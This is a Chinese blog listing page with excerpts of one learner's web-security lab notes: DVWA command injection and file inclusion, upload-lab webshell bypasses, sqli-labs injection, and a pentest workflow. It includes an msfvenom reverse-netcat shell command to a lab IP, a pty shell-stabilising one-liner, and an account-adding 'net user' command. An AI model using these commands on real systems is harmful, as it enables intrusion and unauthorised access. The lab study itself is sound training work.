自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 收藏
  • 关注

原创 windows关闭高危端口

echo "恭喜您,危险端口已经关闭,请重新启动电脑后用netstat -an查看本地端口"echo “正在关闭Workstation(LanmanWorkstation)服务”echo “正在关闭Server(LanmanServer)服务”echo"正在帮您关闭这些危险端口,请稍等"echo 您正在使用一键屏蔽危险端口和服务。echo 正在屏蔽135端口 请稍候…echo 正在屏蔽137端口 请稍候…echo 正在屏蔽138端口 请稍候…echo"正在帮您屏蔽端口...."echo ”正在启用防火墙“

2023-02-02 09:11:52 728

原创 遇见的问题

host 文件 windows:C:\Windows\System32\drivers\etc linux linux: /etc/hosts/host克隆虚拟机(软链接克隆)无法加载和启动网卡:重新生成mac地址,变动网卡数量,删除uuid,重启虚拟机即可解决

2022-12-11 19:19:32 122

原创 常规渗透测试流程

python -c 'import pty;pty.spawn("/bin/bash")' 稳定链接shell的python环境命令

2022-12-04 18:22:32 449

原创 dava靶场远程命令执行

和中难度一样的过滤方法,过滤的内容增加了尝试双写执行||||带入执行成功。联合逻辑符号&带入其他命令查看可以执行,此处带入的是ip查看命令。通关思路和低难度一样用未过滤的字符&执行后续命令。

2022-10-19 19:15:55 1038

原创 upload靶场思路

用编辑器以十六进制方式打开,并打开本地原上传文件比对出未更改的部分,插入木马函数等信息上传即可。根据返回可以看到允许的文件并且根据burp发现发起的请求并没有被抓取可以确定此项为前端验证。POST请求需要在十六进制里面00截断,便于识别操作可以额外添加字符a标识编码为61。注意访问资源的时候把隐写部分后面的删除不然报错访问不到。直接在抓取包后缀添加,解析的时候去除隐写内容。后续的345均未解析成功只成功上传测试文件。利用后端执行删除文件的时间间隙生成后门文件。合成的更改后缀为jpg的测试文件。

2022-10-18 20:30:03 854

原创 代码审计:任意文件包含(php4.81版本)

根据以上分析利用url的二次加密可以修改到传参的文件路径以二次加加密编码的‘?此处追溯新参数$target_blacklist)黑名单文件为import.php/export.php。本次采用的是关键字定位,使用工具为seay源代码审计系统。作用url解码,后续的效果同上一条匹配白名单。此条切割英文字符传参截取中文部分匹配白名单。mb_strpos()函数匹配截取的长度。mb_substr()函数切割中文作用。在黑名单匹配不到target的传参值。传参可以匹配到定义的白名单。定位原则:有变量参数传入。

2022-10-18 19:33:57 1014

原创 dvwa文件包含

直接分析源码发现过滤方式是使用的替换函数str_replace过滤了http://和https://和相对路径的表示符号../替换为空字符串,此处可以双写绕过waf。本地:测试文件未在上层所以不影响直接使用,要是需要读取上层文件同理在使用../的时候插入成双写模式..././根据页面的三个文件点击可以发现后端是get方式用url栏的page传参也可以直接分析源码看到是未作任何过滤。对应的文件存放路径如下(前面是网络访问路径,后面是本地路径)然后我们构造其他不存在的文件有回显报错信息爆出文件路径。

2022-10-17 20:41:24 371

原创 windows命令

ren/重命名文件 dir/显示文件和子目录 type/显示文件内容。“netstat -s”命令, 查看正在使用的所有协议使用情况。ver/显示windows版本 exit/退出程序。md ,mkdir 创建文件夹在当前目录下。“netstat -n”命令, 查看端口的网络连接情况。del/删除文件 +/s/q表示不要提醒。“netstat -a”命令, 查看开启了哪些端口。“netstat -v”命令, 查看正在进行的工作。rd, mdir 删除目录。

2022-10-17 20:29:11 123

原创 漏洞基础题

扫描方式syn半连接需要root权限没有痕迹,全连接简单没有权限要求容易被监测发现,反向扫描null通过没有标志位的数据包分析操作系统(windows遵从rfc793标准,linux不遵从),fin扫描,ack扫描 RFC793:如果TCP端口处于关闭则响应一个RST数据包,若处于开放则无响应。抑制:限制攻击范围 (断系统,断网,关闭部分服务,修改防火墙规则,修改被攻击账号,加强监控,设置诱饵进一步分析,)先通过各种平台,工具搜集网站信息,系统,服务,后台,敏感文件,查询已知漏洞等信息。

2022-10-15 10:36:45 290

原创 系统基础题

lvs工作在第四层,负载能力强、配置性低、工作稳定、无流量、几乎支持所有应用(http,mysql。nginx工作在第七层,可以做分流策略,对网络依赖小,配置繁琐,支持健康检查,动静分离,请求重发。两个线程,mysqlIO,replay,通过master的二进制日志,salve进行同步操作。200请求成功,300+重定向,403权限问题,404资源不存在,500+服务器故障。发送端计算号md5值与文件一起传输,接收端通过两次以上校验比对相同则判断上传完成。判断文件末尾几位数是否一致。如何判断文件上传成功?

2022-10-15 10:35:31 195

原创 网络基础题

表:邻居表(存放邻居信息状态,id,接口),LSDB表(存放链路状态信息LSA的数据库),OSPF路由表(最优路径表存放cost,destination,nexthop)链路通告:1告知DR身份,2DR发送的链路信息通告,3两个区域交互发送,4ABR发送的通告ASBR,5ASBR通告外部路由,7NSSA区域的ASBR发送通告外部路由。区域:骨干区域,标准区域,末梢区域(没有457LSA),完全末梢区域(没有3457LSA),非纯末梢区域,完全非纯末梢区域。传输层:TCP,UDP,TLS。

2022-10-15 10:32:22 413

原创 长城初级靶场

net user admin admin@123 /add :此处用户名admin 密码admin@123 /add添加用户(已有用户会当做更改用户名比如administrator)net user 查看所有用户 net user test1 /active:yes (no)激活/禁用用户。其他常规参数--dbs --tables --columns 爆库爆表爆字段 --dump 显示打印。主要通过御剑后台和7kbscan扫描,搜集了后台信息页面。

2022-10-14 17:53:08 546

原创 sqli靶场less1

利用sql系统函数带出版本和库名为5.0以上可以利用系统库information_schema。利用系统库和系统函数group_concat拼接带出系统全部的表名字和表中包含字段列名字。构造闭合用order by判断字段数带入发现3有值4报如下信息得出只有三个字段。利用联合union查询 让前面的id闭合报错得出存在值的字段数是2,3。用转义符号“\”可以看到回显报错如下,判断出闭合符为'不同id可以看到有返回不同值,判断该处为功能点。1先查找功能点,是否可以传参。

2022-10-08 09:33:35 83

原创 day6.23

文件上传漏洞危害1服务器文件被外界浏览导致信息泄露2恶意脚本被任意执行(篡改网站,执行非法操作,攻击其他网站等.....)文件上传实验复现:菜刀和反弹shell的复现首先上传小马在dvwa 直接菜刀切入验证添加终端 反弹shell首先上传反弹小马传参dir测试有被解析 生成反弹木马:msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.2.137 LPROT=5678 (未完成)。。。。。。。。。。pass1删除上传页面的js事件成功上传phpinfo测试页验证

2022-06-24 00:10:16 679

原创 day6.19

php支持的数据类型四种标量类型:boolean布尔型,integer整形,float浮点型(同double),string(字符串);两种复合型:array(属组),object(对象);两种特殊类型:resource(资源),NULL(无类型);布尔型不区分大小写关键字true,false;整形支持二进制,八进制,十进制,十六进制;编写随堂文件放在网站默认目录下验证解析是否成功 遇见的问题:标点符号缺失导致语法报错,报错的时候注意并不精确,前后行都需要关注。结尾;不能缺失...

2022-06-19 17:40:01 49

原创 day6.16

1,DOM的含义?全程:Doxcument Object Model,文档对象模型。概念:将网页中的标签转换为一个对象节点,使其可以使用脚本语言对节点进行操作2,怎样去找到web网页中的标签元素? 1通过元素id(唯一标识) 2通过tag 3通过classs(类) 4通过name3,复现随堂实验添加innerhtml属性节点appendchild函数添加节点删除节点 追加更改节点属性注意点getElement使用的单复数,id只能为单数无s...

2022-06-16 22:45:19 56

原创 day6.14

html:超文本标记语言结构: //声明 //头部 //字符

2022-06-15 08:30:51 44

原创 day6.13

十大报错函数: 1、floor()2、extractvalue()3、updatexml()4、exp()5、geometrycollection()6、multiponint()7、polygon()8、multipolygon()9、linestring()10、multilinestring()常用函数----------字符串连接函数concat(str1, str2, str3 ,...)将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空concat_ws('

2022-06-14 08:46:59 479

原创 less3-4

探测是否存在注入漏洞以及闭合方式。根据回显判断出闭合方式为’)查询行列判断注入点使前面为报错根据回显爆当前数据库版本,库名,用户。 sql版本5.0以上即用information_schema库爆出其他信息(库,列,字段) less4根据回显判断出闭合方式为”)查询行列数和版本号 利用information_schema爆出其他信息 问题:对于information_schema库不熟悉,以及基础的查询语法和函数不了解地掌握导致爆行列字段感觉到很大的难度...

2022-06-11 16:17:19 498

原创 web安全学习日记

搭建实验环境问题1网站搭建完成页面解析不到,修改页面php文件后缀拓展名解决。2进入页面与数据库连接失败解决流程先更改配置文件内的数据库密码和用户与小皮中的一致,然后连接成功再数据库查询到环境用户和密码登入即完成环境搭建查看到数据库信息修改配置的信息查询用户信息 拿到页面访问成功......

2022-06-09 11:39:41 72

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除